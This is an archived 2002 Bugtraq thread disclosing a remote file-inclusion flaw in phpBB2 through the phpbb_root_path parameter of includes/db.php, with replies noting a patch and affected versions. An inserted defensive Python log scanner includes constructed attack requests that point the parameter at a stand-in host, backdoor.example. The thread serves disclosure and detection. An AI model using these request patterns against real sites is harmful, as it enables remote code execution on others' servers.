8166109 2002-03-18 16:47 +0000  /25 lines/ nullbyte <nullbyte@inetd-secure.net>
Sent by: joel@lysator.liu.se
Imported: 2002-03-20  01:12  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <21489>
Subject: phpBB2 remote execution command
------------------------------------------------------------
From: nullbyte <nullbyte@inetd-secure.net>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <Pine.BSF.4.44.0203181645580.19291-101000@inetd-secure.net>

phpBB2 is vulnerable to remote execution command

All *nix running phpBB2 version 2.0.

Bug could be found at "phpBB2 root path" which allows a remote
attacker to execute any command remotely.  The vulnerability of this
attack starts with '/phpBB2/includes/db.php?phpbb_root_path=' but some
backdoor server is needed to launch the attack.

I did not look further into this bug.  It is tested on most *nix
systems running phpBB2 version 2.0. Probably all versions.

Bug was found by pokley and nullbyte

nullbyte
nullbyte@inetd-secure.net
(8166109) /nullbyte <nullbyte@inetd-secure.net>/(Rewrapped)
Attachment (application/octet-stream) in text 8166110
Comment in text 8172819 by Nathan Anderson <nathan@andersonsplace.net>
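
Added example, not part of the original post or of phpBB: a Python scan of web-server access logs for requests that set the phpbb_root_path parameter named in the advisory above. The log lines, client addresses and the host backdoor.example are constructed, and Common/Combined Log Format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "phpbb_root_path"  # parameter named in the advisory
# client ... "METHOD target PROTO" status  (Common/Combined Log Format, assumed)
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines; addresses and hostnames are illustrative only.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2002:16:50:01 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=http://backdoor.example/ HTTP/1.0" 200 312',
    '203.0.113.5 - - [18/Mar/2002:16:50:09 +0000] "GET /phpBB2/viewtopic.php?t=9105 HTTP/1.0" 200 8841',
    '198.51.100.7 - - [18/Mar/2002:16:51:30 +0000] "GET /forum/includes/db.php?%70hpbb_root_path=http%3A%2F%2Fbackdoor.example%2F HTTP/1.0" 200 290',
    '192.0.2.44 - - [18/Mar/2002:16:52:02 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=./ HTTP/1.0" 200 0',
]


def classify(target):
    """Return None, 'override' or 'remote-url' for one request target."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes names and values, so an encoded parameter
    # name or an encoded "://" is matched as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # PHP also accepts array syntax such as phpbb_root_path[]=...
        if name.split("[", 1)[0] != PARAM:
            continue
        if "://" in value or value.startswith("//"):
            return "remote-url"   # include path points at another host
        return "override"         # no legitimate client sets this at all
    return None


def scan(lines):
    """Yield (client, status, path, verdict) for each suspicious line.

    Only the query string is visible in an access log; the same variable
    supplied in a POST body or cookie would not show up here.
    """
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        verdict = classify(target)
        if verdict:
            yield client, int(status), urlsplit(target).path, verdict


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```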

8166110 2002-03-18 16:47 +0000  /11 lines/ nullbyte <nullbyte@inetd-secure.net>
Attachment filename: "phpBB2.tar.gz"
Imported: 2002-03-20  01:12  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <21490>
Attachment (text/plain) to text 8166109
Subject: Attachment (phpBB2.tar.gz) to: phpBB2 remote execution command
------------------------------------------------------------
(8166110) /nullbyte <nullbyte@inetd-secure.net>/(Rewrapped)

8160619 2002-03-18 20:17 -0500  /44 lines/ Jose Romeo Vela <jrvela@aristasol.com>
Sent by: joel@lysator.liu.se
Imported: 2002-03-19  05:29  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
External CC recipient: nullbyte@inetd-secure.net
Recipient: Bugtraq (import) <21480>
Subject: Re: phpBB2 remote execution command (fwd)
------------------------------------------------------------
From: Jose Romeo Vela <jrvela@aristasol.com>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>, <nullbyte@inetd-secure.net>
Message-ID: <Pine.LNX.4.33.0203182010520.12002-100000@la-sirena.aristasol.com>


--- nullbyte <nullbyte@inetd-secure.net> wrote:
> phpBB2 is vulnerable to remote execution command
>
> All *nix running phpBB2 version 2.0.
>
> Bug could be found at "phpBB2 root path" which allows a remote
> attacker to execute any command remotely.
> The vulnerability of this attack starts with
> '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
> is needed to launch the attack.
>
> I did not look further into this bug.
> It is tested on most *nix systems running phpBB2 version 2.0.
> Probably all versions.
>
> Bug was found by pokley and nullbyte
>
> nullbyte
> nullbyte@inetd-secure.net
>

This bug only affects non-CVS versions. There is a fix available. For
details see:

http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105


---------------------------------------------------------------------
Jose Romeo Vela
jrvela@aristasol.com
http://www.aristasol.com/
(8160619) /Jose Romeo Vela <jrvela@aristasol.com>/--

8172819 2002-03-19 13:32 -0800  /15 lines/ Nathan Anderson <nathan@andersonsplace.net>
Sent by: joel@lysator.liu.se
Imported: 2002-03-21  08:48  by Brevbäraren
External recipient: 'nullbyte' <nullbyte@inetd-secure.net>
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <21522>
Comment on text 8166109 by nullbyte <nullbyte@inetd-secure.net>
Subject: RE: phpBB2 remote execution command
------------------------------------------------------------
From: "Nathan Anderson" <nathan@andersonsplace.net>
To: "'nullbyte'" <nullbyte@inetd-secure.net>,
 <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>
Message-ID: <002701c1cf8d$8ea3ea90$8f00a8c0@mt8100>

>>All *nix running phpBB2 version 2.0.<<

Actually it is RC3 and prior. There is a patch for this and the latest
CVS and RC4 do not have this problem.

Nathan.
(8172819) /Nathan Anderson <nathan@andersonsplace.net>/